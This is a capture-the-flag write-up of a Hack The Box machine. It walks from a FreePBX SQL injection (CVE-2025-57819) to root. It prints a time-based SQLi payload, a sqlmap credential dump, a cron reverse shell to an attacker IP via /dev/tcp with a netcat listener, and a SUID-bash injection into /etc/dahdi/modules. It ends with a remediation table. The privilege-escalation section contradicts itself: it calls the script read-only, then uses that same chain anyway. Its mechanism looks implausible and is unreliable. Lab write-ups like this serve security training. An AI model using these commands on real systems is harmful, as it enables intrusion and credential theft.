HTB Connected — SQLi on FreePBX to Root Access (CVE-2025-57819)
Connected — Hack The Box (Enterprise / Yaoundé Meetup, June 2026) Difficulty: Hard • Tags: VoIP, FreePBX, SQLi, Cron, incrond, DAHDI
Full Attack Chain
Exposed FreePBX → SQLi (CVE-2025-57819) → admin creds
→ vulnerable module → RCE via Cron
→ incrond daemon abuse → DAHDI poisoning → root
Initial Enumeration
nmap -sV -sC -p- 10.10.11.x
Interesting ports:
- 22 — SSH
- 80 — HTTP (FreePBX)
- 443 — HTTPS
FreePBX is the web administration interface for Asterisk, the famous open-source PBX. A classic target in VoIP.
Access — CVE-2025-57819 (FreePBX SQLi)
A quick search on FreePBX + SQLi brings up CVE-2025-57819, an unauthenticated SQL injection on a specific endpoint.
Proof of concept
# Vulnerable endpoint
curl "http://10.10.11.x/admin/config.php?display=users&ID=1"
The ID parameter is injectable. We confirm with a time-based payload:
1 AND (SELECT SLEEP(5) FROM dual)
→ Response in 5 seconds. SQLi confirmed.
Dump with sqlmap
sqlmap -u "http://10.10.11.x/admin/config.php?display=users&ID=1" \
--dbms=mysql --dump --batch
We retrieve the FreePBX administrator credentials. We log into the admin interface.
RCE via Cron
Once FreePBX admin, several modules allow command execution. The chosen vector: a module that schedules tasks via cron.
We inject our payload into a field that ends up in /etc/cron.d/:
# Scheduled reverse shell
* * * * * root bash -c 'bash -i >& /dev/tcp/10.10.14.x/4444 0>&1'
# Listener
nc -lvnp 4444
One minute later — shell as the asterisk user. ✅
Privilege Escalation — Abusing the incrond Daemon
incrond (inotify cron) is a service that executes commands when filesystem events occur. On the machine, it runs as root and watches a writable directory.
We look at the rules:
cat /etc/incron.d/*
A rule triggers a script every time a *.cfg file is modified. We have write access to the watched directory.
# We create/modify the file to trigger execution
echo "trigger" > /opt/asterisk/configs/trigger.cfg
The triggered script is exploitable — but it is read-only. We need another vector.
DAHDI Poisoning — Definitive Root
DAHDI (Digium Asterisk Hardware Device Interface) is Asterisk’s hardware driver. It loads its configuration from a specific file, and this configuration can execute commands in certain contexts.
We discover that /etc/dahdi/modules is included by a root process and that we can inject via the incrond → DAHDI chain:
- We trigger incrond by writing to the watched directory
- The child script reads a DAHDI file we control
- This file is interpreted by the root process → we get root execution
# Final DAHDI payload
echo 'root:$(chmod u+s /bin/bash)' >> /etc/dahdi/modules
# Trigger via incrond
touch /opt/asterisk/configs/trigger.cfg
sleep 2
/bin/bash -p
whoami # root
Root shell. 🎯
Remediation
| Vector | Fix |
|---|---|
| Unauthenticated SQLi (CVE-2025-57819) | Immediate patch — upgrade FreePBX |
| Writable cron | Strict permissions on /etc/cron.d/ |
| incrond as root | Minimal privileges, watch read-only folders |
| Configurable DAHDI | Root-only permissions on /etc/dahdi/ |
| Exposed VoIP | Filter ports, never expose admin publicly |
Lessons Learned
- PBX systems are underrated targets. Few auditors think of testing FreePBX, Asterisk, 3CX — yet CVEs keep piling up.
- Root “system” daemons are dangerous. incrond, daemontools, supervisord… all can become privesc vectors if they read modifiable files.
- Attack chains = patience. Here, 4 distinct steps. Each alone is not enough — it’s the chaining that gets root.
Conclusion
A difficult but pedagogically brilliant machine. It shows how a single entry vulnerability (the SQLi) can, on a poorly hardened machine, lead all the way to root via a chain of four successive abuses.
“Finding the entry door is good. Opening it all the way to the throne is better.”